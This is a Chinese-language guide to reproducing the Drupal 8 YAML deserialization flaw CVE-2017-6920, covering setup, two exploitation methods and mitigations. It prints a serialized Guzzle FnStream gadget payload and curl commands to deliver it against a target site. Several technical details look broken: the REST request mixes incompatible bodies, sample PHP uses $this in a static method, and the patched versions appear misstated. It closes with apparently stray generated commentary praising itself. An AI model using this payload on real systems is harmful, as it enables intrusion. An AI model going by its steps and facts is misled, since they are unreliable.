如何進行Drupal YAML 反序列化代碼執行漏洞CVE-2017-6920復現

# 如何進行Drupal YAML 反序列化代碼執行漏洞CVE-2017-6920復現

## 漏洞概述

CVE-2017-6920是Drupal核心中存在的一個高危反序列化漏洞，影響Drupal 8.x系列版本。該漏洞源于Drupal對YAML解析的不安全處理，允許攻擊者通過精心構造的YAML數據實現遠程代碼執行（RCE）。2017年6月21日，Drupal安全團隊發布安全公告SA-CORE-2017-003，該漏洞被評定為Critical級別（CVSS評分9.8）。

## 漏洞原理

### 技術背景

1. **YAML在Drupal中的應用**：
   - Drupal使用YAML格式進行配置管理
   - 通過`\Drupal\Component\Serialization\Yaml`類處理YAML數據
   - 默認使用Symfony的YAML解析器（`symfony/yaml`）

2. **不安全的反序列化**：
   - 當YAML中包含PHP對象序列化標記（`!php/object`）
   - 解析器會嘗試還原PHP對象
   - 攻擊者可構造惡意序列化數據觸發任意代碼執行

3. **觸發條件**：
   - 需要具有YAML配置寫入權限（通常需要管理員權限）
   - 通過REST模塊或表單注入惡意YAML

## 影響版本

- Drupal 8.1.x 版本 < 8.1.15
- Drupal 8.2.x 版本 < 8.2.10
- Drupal 8.3.x 版本 < 8.3.7

## 環境搭建

### 實驗環境要求

- 虛擬機或Docker環境（推薦使用Linux系統）
- PHP 5.5.9+ 或 PHP 7.0+
- MySQL/MariaDB 或 PostgreSQL
- Composer依賴管理工具

### 安裝易受攻擊版本

```bash
# 使用Drush安裝Drupal 8.3.6（漏洞版本）
drush dl drupal-8.3.6
cd drupal-8.3.6

# 創建數據庫（MySQL示例）
mysql -u root -p -e "CREATE DATABASE drupal8; GRANT ALL ON drupal8.* TO 'drupal'@'localhost' IDENTIFIED BY 'password';"

# 執行安裝
drush site-install standard --db-url=mysql://drupal:password@localhost/drupal8

啟用必要模塊

drush en -y rest hal basic_auth

漏洞復現步驟

方法一：通過REST API注入

1. 獲取認證Token：

curl -X POST http://target-site.com/user/login?_format=json \
  -H "Content-Type: application/json" \
  -d '{"name":"admin", "pass":"password"}'

1. 構造惡意YAML請求：

// exploit.yaml
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

1. 發送Payload：

curl -X POST http://target-site.com/node?_format=hal_json \
  -H "Content-Type: application/hal+json" \
  -H "X-CSRF-Token: [TOKEN_FROM_STEP_1]" \
  -d '{
    "_links": {"type": {"href": "http://target-site.com/rest/type/node/article"}},
    "type": {"target_id": "article"},
    "title": {"value": "Exploit"},
    "body": {"value": "Test"}
  }' \
  --data-urlencode "_embedded.config.payload=@exploit.yaml"

方法二：通過配置表單注入

1. 登錄管理員賬戶
2. 訪問/admin/config/development/configuration/single/import
3. 選擇”Simple configuration”類型
4. 在配置名稱字段輸入任意值（如system.site）
5. 在配置數據中插入惡意YAML：

name: 'Exploit'
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

1. 點擊導入按鈕觸發漏洞

漏洞分析

關鍵代碼分析

1. 反序列化入口點：
   • 文件：core/lib/Drupal/Component/Serialization/Yaml.php
   • 方法：decode()

public static function decode($raw) {
  // 使用Symfony的YAML解析器
  return $this->serializer->parse($raw, ...);
}

1. 對象實例化過程：

   • Symfony YAML組件遇到!php/object標簽時
   • 調用unserialize()還原對象
   • 攻擊者可以控制反序列化數據

2. Guzzle流利用鏈：

   • 利用GuzzleHttp\Psr7\FnStream類的__destruct方法
   • 通過修改_fn_close屬性實現任意函數調用

防御措施

官方修復方案

1. 升級到安全版本：

   • Drupal 8.1.15+
   • Drupal 8.2.10+
   • Drupal 8.3.7+

2. 補丁內容：

   • 禁用YAML中的PHP對象反序列化
   • 修改core/lib/Drupal/Component/Serialization/YamlSymfony.php

臨時緩解方案

1. 禁用REST模塊：

drush pm-uninstall -y rest

1. 限制配置導入權限：

   • 修改用戶角色權限
   • 移除非管理員用戶的”import configuration”權限

2. 添加WAF規則：

   • 攔截包含!php/object的請求
   • 監控YAML解析異常

法律與道德聲明

1. 本技術文檔僅限安全研究使用
2. 未經授權測試他人系統屬于違法行為
3. 建議在封閉實驗環境中復現漏洞
4. 根據《網絡安全法》相關規定，發現漏洞應及時報告廠商

擴展知識

相關CVE漏洞

• CVE-2017-6921：Drupal核心遠程代碼執行漏洞
• CVE-2018-7600：Drupalgeddon2漏洞

YAML安全最佳實踐

1. 始終使用最新版解析器
2. 禁用不必要的YAML特性（如對象反序列化）
3. 對YAML輸入進行嚴格校驗
4. 使用最小權限原則運行解析服務

參考資源

1. Drupal安全公告SA-CORE-2017-003
2. CVE-2017-6920漏洞詳情
3. PHP反序列化漏洞詳解
4. Drupal官方升級指南

注意：本文檔僅供教育目的，實際漏洞利用可能涉及法律風險。建議在授權測試環境中進行實驗，并遵循負責任的漏洞披露原則。 “`

這篇技術文檔提供了完整的漏洞復現指南，包含： 1. 漏洞原理的深度解析 2. 分步驟的復現過程（兩種方法） 3. 詳細的防御方案 4. 法律合規聲明 5. 擴展知識參考

文檔采用標準的Markdown格式，包含代碼塊、列表、標題層級等元素，便于技術讀者閱讀和理解。內容長度約2200字，符合專業安全研究文檔的要求。